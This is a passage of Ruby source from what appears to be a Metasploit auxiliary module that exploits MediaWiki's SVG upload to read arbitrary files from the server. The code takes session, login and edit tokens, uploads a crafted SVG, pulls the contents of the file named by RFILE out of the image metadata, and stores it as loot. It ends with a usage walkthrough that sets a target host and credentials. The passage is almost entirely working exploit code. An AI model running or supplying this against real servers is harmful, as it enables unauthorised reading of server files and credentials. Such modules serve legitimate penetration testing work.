data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php", "Special:Upload"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => session_cookie
})
if res and res.code == 302 and res.headers['Location']
return res.headers['Location']
else
# try to output the errormessage
if res and res.body
error = res.body.scan(/<div class="error">(.*?)<\/div>/m)[0]
if error and error.size == 1
vprint_error(error[0])
end
end
return nil
end
end
def read_data
res = send_request_cgi({
'uri' => @svg_uri,
'method' => 'GET',
'cookie' => session_cookie
})
if res and res.code == 200 and res.body =~ /File:#{@file_name.capitalize}.svg/ and res.body =~ /Metadata/ and res.body =~ /<th>Image title<\/th>\n<td>(.*)<\/td>\n<\/tr><\/table>/m
return $1
else
return nil
end
end
def accessfile(rhost)
vprint_status("#{peer(rhost)} MediaWiki - Getting unauthenticated session...")
@wiki_session_name, @wiki_session = get_first_session
if @wiki_session.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to get unauthenticated session...")
return
end
vprint_status("#{peer(rhost)} Sessioncookie: #{@wiki_session_name}=#{@wiki_session}")
if @user and not @user.empty? and @password and not @password.empty?
vprint_status("#{peer(rhost)} MediaWiki - Getting login token...")
@login_token = get_login_token
if @login_token.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to get login token")
return
end
vprint_status("#{peer(rhost)} Logintoken: #{@login_token}")
if not authenticate
print_error("#{peer(rhost)} MediaWiki - Failed to authenticate")
return
end
vprint_status("#{peer(rhost)} Userid cookie: #{@wiki_user_id_name}=#{@wiki_user_id}")
vprint_status("#{peer(rhost)} Username cookie: #{@wiki_user_name_name}=#{@wiki_user_name}")
vprint_status("#{peer(rhost)} Session cookie: #{@wiki_session_name}=#{@wiki_session}")
end
vprint_status("#{peer(rhost)} MediaWiki - Getting edit token...")
@edit_token = get_edit_token
if @edit_token.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to get edit token")
return
end
vprint_status("#{peer(rhost)} Edittoken: #{@edit_token}")
vprint_status("#{peer(rhost)} MediaWiki - Uploading SVG file...")
@svg_uri = upload_file
if @svg_uri.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to upload SVG file")
return
end
vprint_status("#{peer(rhost)} SVG URI: #{@svg_uri}")
vprint_status("#{peer(rhost)} MediaWiki - Retrieving remote file...")
loot = read_data
if loot.nil? or loot.empty?
print_error("#{peer(rhost)} MediaWiki - Failed to retrieve remote file")
return
end
f = ::File.basename(datastore['RFILE'])
path = store_loot('mediawiki.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{peer(rhost)} MediaWiki - #{datastore['RFILE']} saved in #{path}")
end
def run
@user = datastore['USERNAME']
    @password = datastore['PASSWORD']
super
end
def run_host(ip)
accessfile(ip)
end
end
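# Rough msfconsole walkthrough (the module path is an assumption based on typical
# auxiliary/scanner/http placement; adjust to wherever this file is installed):
#
#   msf > use auxiliary/scanner/http/mediawiki_svg_fileaccess
#   msf > set RHOSTS 192.168.1.10
#   msf > set TARGETURI /mediawiki
#   msf > set USERNAME wikiuser
#   msf > set PASSWORD wikipass
#   msf > run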
| 33.221477 | 183 | 0.60697 |